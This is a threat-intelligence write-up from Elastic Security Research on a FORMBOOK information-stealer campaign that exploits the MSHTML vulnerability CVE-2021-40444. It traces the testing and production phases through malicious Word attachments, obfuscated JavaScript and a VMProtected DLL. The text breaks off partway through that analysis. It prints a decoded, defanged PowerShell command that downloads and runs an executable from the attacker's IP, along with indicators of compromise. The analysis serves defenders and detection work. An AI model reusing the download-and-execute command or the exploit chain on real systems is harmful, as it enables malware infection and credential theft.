# FORMBOOK Adopts CAB-less Approach
**[elastic.github.io/security-research/intelligence/2022/01/01.formbook-adopts-cabless-approach/article/](https://elastic.github.io/security-research/intelligence/2022/01/01.formbook-adopts-cabless-approach/article/)**
[FORMBOOK](https://elastic.github.io/security-research/tags/#formbook) [Malware](https://elastic.github.io/security-research/tags/#malware) [Phishing](https://elastic.github.io/security-research/tags/#phishing) [CVE-2021-40444](https://elastic.github.io/security-research/tags/#cve-2021-40444)
-----
2022-01-18
-----
The Elastic Intelligence & Analytics team is tracking a new FORMBOOK information stealing campaign leveraging the
[MSHTML remote code exploit (CVE-2021-40444). This campaign has been observed sharing infrastructure between the](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444)
[Weaponization phases of both the testing and production releases.](https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html)
We have observed, and will discuss, three phases of this campaign relevant to defenders:
Testing phase using CVE-2021-40444
Production phase using CVE-2021-40444
Generic phase without CVE-2021-40444
As of November 8, 2021, Elastic observed network infrastructure actively being used to deploy the FORMBOOK information
stealer and acting as a command and control endpoint serving archives, implants, and scripts leveraged throughout the
campaign variations.
Shout Out
We wanted to call out some great adjacent research from the team as Sophoslabs Uncut that was released on December 21,
2021. Research groups frequently analyze similar, or in this case, the same campaigns through their lens. This is fantastic as
it gets more eyes, from different perspectives, onto the same problem. If you’re looking for more information, please check
[out their research over on their blog.](https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/)
## Key Takeaways¶
The speed at which vulnerability PoC’s are being released highlights the need to leverage threat hunting to identify
post-exploitation events before patches can be applied
A FORMBOOK campaign was observed combining infrastructure that allowed testing and production phases to be
linked together
Patching for the MSHTML exploit appears to be effective as the campaign shifted from attempting to use the exploit to a
traditional phishing malware-attachment approach
The campaign required a multi-process attack chain to load a DLL file onto victim systems
[On September 7, 2021, Microsoft confirmed a vulnerability for the browser rendering engine used in several applications such](https://nvd.nist.gov/vuln/detail/CVE-2021-40444)
[as those within the Microsoft Office suite. Within three days [1] [2], proof-of-concept code was released, highlighting the](https://twitter.com/vxunderground/status/1436326057179860992?s=20)
maturity of the exploit development ecosystem and underscoring the importance of proactive threat hunting and patch
management strategies.
Based on telemetry, we observed this exploit used in conjunction with the FORMBOOK information stealer. We also identified
an adversary tradecraft oversight that led to us connecting what appeared to be campaign testing infrastructure and a
FORMBOOK phishing campaign targeting manufacturing victims with global footprints.
This post details the tactics, techniques, and procedures (TTPs) of this campaign. Our goal is to enable detection capabilities
for security practitioners using the Elastic Stack and any readers concerned with the CVE-2021-40444 vulnerability or
campaigns related to FORMBOOK.
## Details¶
[When Microsoft disclosed a vulnerability in the browser rendering engine used by multiple Microsoft Office products, proof-of-](https://nvd.nist.gov/vuln/detail/CVE-2021-40444)
concept code was released within three days. This allowed defenders to observe how the exploit operated and to develop
[countermeasures to defend their networks while patches and mitigating workarounds could be deployed [1], [2], [3], [4], [5],](https://github.com/aslitsecurity/CVE-2021-40444_builders)
[[6].](https://twitter.com/vxunderground/status/1436326057179860992?s=20)
Additionally, this highlights the maturity of the exploit development community — underscoring the importance of proactive
measures (like network and endpoint monitoring, anti-spam/phishing countermeasures, email MIME-type attachment policies,
etc.) and an exercised patch management strategy.
At a high level, an attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that will allow
for code to be remotely executed on a victim machine. While this vulnerability is well documented, security researcher
[Edubr2020 did a](https://twitter.com/Edu_Braun_0day) [fantastic job of explaining how the exploit works in a default configuration, as well as a more clever](https://github.com/Edubr2020/CVE-2021-40444--CABless)
“CABless” approach. Our telemetry observed both the default configuration and the CABless approach. We describe these in
detail below
-----
We initiated several collection techniques simultaneously, including searching for malicious attachments that would be
included in phishing emails — one of the most common mechanisms for distributing exploit code. We noticed that not many
malicious email attachments had been reported, and by October 28, 2021, we were only able to identify four instances of this
exploit leveraged with email. In addition to the four instances of the exploit, we observed the threat actor attempting to
leverage a generic phishing approach with the FORMBOOK malware as an attachment.
The next following sections will break down these different campaign sightings and their respective details:
Testing
Production
Generic
Important
Throughout the Details section, it is important to note a few things that are required for this attack chain to function,
irrespective of the Testing or Production phases
1. A major challenge for the campaign is to get a DLL file onto the victim system
2. ActiveX controls are DLL files with special constraints
3. Web pages can link ActiveX controls directly or load files that are contained in a URL — this is not recommended by
_Microsoft because file signatures cannot be validated_
### Testing phase¶
The first sighting contained an email with a single attachment with a sender of `admin0011[@]issratech.com . While`
researching that email address, we discovered this email address associated with additional malicious samples in VirusTotal.
The email observed in this phase included a single attachment called `Request Details.docx .`
-----
Email attachments are stored as Base64 encoded strings in the email. To extract the `Request Details.docx email`
attachment, we can use the `echo command to send the Base64 encoded string to` `STDOUT, pipe it to the` `base64`
program, and save it as `email-attachment so that we can analyze it.`
Decoding the email attachment
```
$ echo "UEsDBBQAAAAIAFCELVO0gTweZgEAAIgFAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbLVUyWrDMBC9F/oPRtdgK+...truncated..." \
| base64 -D -o email-attachment
```
**Request Details.docx¶**
The `file command is a standard Unix and Unix-like program for identifying a file type. Running the` `file command,`
verified that this was a Microsoft Word document:
Verifying the email attachment file type
Microsoft Office documents, post-2007, are compressed archives. To dig into the document without opening it, you can
decompress the file using the “unzip” command as illustrated above.
Within the document relationship file ( word/_rels/document.xml.rels ), we can view metadata about how different
elements of the document are related to each other.
Email attachment relationship document
-----
```
...truncated...
...truncated
```
[From here, we can see an externally linked MHTML OLE object inside an element using HTML entities, which reserve](https://www.w3schools.com/html/html_entities.asp)
characters in HTML. HTML entities are natively not human readable, so they need to be decoded. Using the data analyzer
[and decoder from the United Kingdom’s Government Communications Headquarters (GCHQ), CyberChef, we were able to](https://gchq.github.io/CyberChef/)
quickly decode the HTML entities with the “From HTML Entity” recipe (CyberChef recipes are pre-configured data parsers
and decoders).
The decoded HTML entity was `HTTP:\\104[.]244[.]78[.]177\Pope.txt . This provided us with another atomic indicator`
to add to the `admin0011[@]issratech.com email address we’d previously collected,` `104[.]244[.]78[.]177 .`
Additionally, the decoded HTML entity revealed another file that could be of interest, `Pope.txt .`
**Pope.txt¶**
We retrieved a copy of `Pope.txt from` `104[.]244[.]78[.]177 and observed that it contained JavaScript code using`
variable renaming and string obfuscation. This JavaScript performs the following functions:
Downloads a Cabinet archive file called `comres.cab from the same IP address but fails to extract it`
[Creates several ActiveX objects (which are executable applications or libraries) to be loaded into the browser rendering](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/automat/activex-objects)
engine
Uses the CVE-2021-40444 vulnerability with the ActiveX objects to perform directory traversal and execute a file called
`IEcache.inf . This filename is the DLL loader from the` [ASL IT Security PoC code and doesn’t exist in this test run](https://github.com/aslitsecurity/CVE-2021-40444_builders/blob/main/CVE-2021-40444/IEcache.inf)
-----
The above figure shows the notable section of the obfuscated JavaScript code. We used a debugger to parse out the results
of the lookup functions (shown commented out with `// ‘s). This revealed the` `classid ( CLSID:edbc374c-5730-432a-`
```
b5b8-de94f0b57217 ) attribute which appears across the web in various other malware analyses of CVE-2021-40444. This
```
suggests with moderate confidence that this JavaScript was crafted using some repurposed code that has been opensourced. The `classid attribute is used to determine if` `comres.cab has already been downloaded — if it has, it won’t`
attempt to download it again.
Once `comres.cab is downloaded and extracted, the extracted file must be located. This is why there are multiple directory`
execution attempts observed in JavaScript. All the work up to this point is to get the DLL ( IEcache.inf ) onto the filesystem.
Finally, the DLL file would be executed as a control panel file ( .cpl ), because control panel files can be loaded as DLLs.
-----
**Comres.cab and 1.doc.inf¶**
In our sample, `comres.cab does not include the ASL IT Security PoC DLL ( IEcache.inf ). It included a file called`
```
1.doc.inf .
```
From `comres.cab we used the file archive utility, 7-Zip, to extract` `1.doc.inf . This file is interesting because it has the`
`.inf` [(setup information file) extension, but in using the](https://docs.microsoft.com/en-us/windows-hardware/drivers/install/overview-of-inf-files) `file command, we can see that it is actually a DLL file, meaning`
that the file type is being obfuscated.
Collecting 1.doc.inf from comres.cab
-----
```
7-Zip [64] 17.04 : Copyright (c) 1999-2021 Igor Pavlov : 2017-08-28
p7zip Version 17.04 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64)
Scanning the drive for archives:
1 file, 6060053 bytes (5919 KiB)
Extracting archive: comres.cab
-Path = comres.cab
Type = Cab
Physical Size = 6060053
Method = None
Blocks = 1
Volumes = 1
Volume Index = 0
ID = 1234
Everything is Ok
Size: 4465152
Compressed: 6060053
$ file 1.doc.inf
1.doc.inf: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
```
[When analyzing the import address table (IAT) of](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#import-address-table) `1.doc.inf, we observed multiple API functions, which would allow the`
file to download and execute additional files. Of particular note were the `ShellExecuteExA and` `URLDownloadToFileW API`
functions.
1.doc.inf import table
```
=== IMPORTS ===
MODULE_NAME HINT ORD FUNCTION_NAME
bcrypt.dll 0 BCryptSetProperty
0 GetKeyState
ADVAPI32.dll 0 RegDeleteKeyW
SHELL32.dll 0 ShellExecuteExA
urlmon.dll 0 URLDownloadToFileW
WS2_32.dll 9
ole32.dll 0 CoInitializeSecurity
NETAPI32.dll 0 NetLocalGroupAddMembers
OLEAUT32.dll 8
PSAPI.DLL 0 GetModuleFileNameExW
0 WTSSendMessageW
0 GetProcessWindowStation
0 LocalAlloc
0 GetModuleFileNameW
0 GetProcessAffinityMask
0 SetProcessAffinityMask
0 SetThreadAffinityMask
0 Sleep
0 ExitProcess
0 FreeLibrary
0 LoadLibraryA
0 GetModuleHandleA
0 GetProcAddress
0 GetProcessWindowStation
0 GetUserObjectInformationW
```
[Through further analysis of the DLLs sections list, we identified that the file was protected with VMProtect (identified by the](https://vmpsoft.com/)
```
.vmp0, .vmp1, .vmp2, .vmp3 sections). “VMProtect protects code by executing it on a virtual machine with non
```
standard architecture that makes it extremely difficult to analyze.”
Viewing the sections of 1.doc.inf
-----
```
p p | {p,,, }
=== SECTIONS ===
NAME RVA VSZ RAW_SZ
.text 1000 12ecd 0
.rdata 14000 49ce 0
.data 19000 1350d8 0
.vmp1 14f000 2c70 0
.vmp0 152000 fac 0
.bss 153000 1000 0
.vmp2 154000 38c0bb 0
.vmp3 4e1000 5c6720 5c6800
.reloc aa8000 5b4 600
```
As we were unable to analyze the VMProtected file, we continued to explore other information that we’d previously collected.
Specifically, we searched for additional samples that had been sent using the same `admin0011[@]issratech.com email`
address. These parallel analyses identified additional samples and campaign phases, which we’re referring to as the
Production and Generic phases.
### Production phase¶
The second, third, and fourth sightings all had the same sender field of `admin0011[@]issratech.com and included a single`
attachment — `Profile.rar file — to deliver the second stage malware.`
**Profile.rar¶**
Previously, we’ve highlighted files that have an extension that differs from their actual file type. To validate that the attachment
is a RAR archive, we again use the `file command to validate that it is a RAR archive.`
Verifying email attachment file type
```
$ file Profile.rar
Profile.rar: data
```
-----
The attachment has a RAR file extension, but instead of having a file type of `RAR archive data, v5, it is raw` `data .`
Analysts who discover a file containing raw data can use the `less command to dump the file contents to` `STDOUT to`
directly inspect what may be inside.
Profile.rar dumped to STDOUT
```
$ less Profile.rar
Rar!...truncated...
```
The raw data includes a script job element that can be natively interpreted by the Windows Script Host (WSH). The job
element directs WSH to spawn a shell that spawns a hidden PowerShell process which then runs a Base64 encoded
PowerShell script. However, the script job element needs to be executed, which isn’t done by double-clicking on the file.
Decoding this string, we can see that a file called `abb01.exe is downloaded and executed from` `104[.]244[.]78[.]177 .`
This is the same IP address we have observed across all Testing and Production phases.
Decoded PowerShell command
```
echo
"aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgB
| base64 -D
```
```powershell title=”Resulting powershell output (defanged) iex ((new-object
system.net.webclient).downloadfile(“http://104[.]244[.]78[.]177/abb01.exe”,”$env:LOCALAPPDATA\dllhostSvc.exe”));StartProcess “$env:LOCALAPPDATA\dllhostSvc.exe”
```
We'll continue to explore this file to identify how the script job is executed. As we displayed above, the file
still
has the `Rar!` header, so we can decompress this archive. First, we'll use the `unrar` program to decompress the
RAR
archive and retrieve the contents: `document.docx`.
```shell title="Decompressing Profile.rar"
$ unrar e Profile.rar
Extracting from Profile.rar
Extracting document.docx OK
All OK
```
**document.docx¶**
While `Profile.rar appears to be a compressed archive, the PowerShell script won’t download and execute` `abb01.exe`
automatically upon decompressing it. To execute that script, the compressed document within `Profile.rar,`
```
document.docx, must be opened.
```
Using the same technique as we highlighted in the Testing phase, we decompressed `document.docx and examined the`
document relationship file ( word/_rels/document.xml.rels ). As previously described, we observed a remote OLE object
stored and formatted as an HTML entity code block that we can decode using CyberChef.
-----
We see the same IP address, `104[.]244[.]78[.]177 and a new filename called` `Profile.html .`
**Profile.html¶**
Based on the HTML code, this initially appeared to be an Apache landing page. However, closer inspection identified another
obfuscated JavaScript towards the bottom of the page.
Profile.html and the obfuscated JavaScript
```
Getting Started - Apache HTTP Server Version 2.5
...truncated…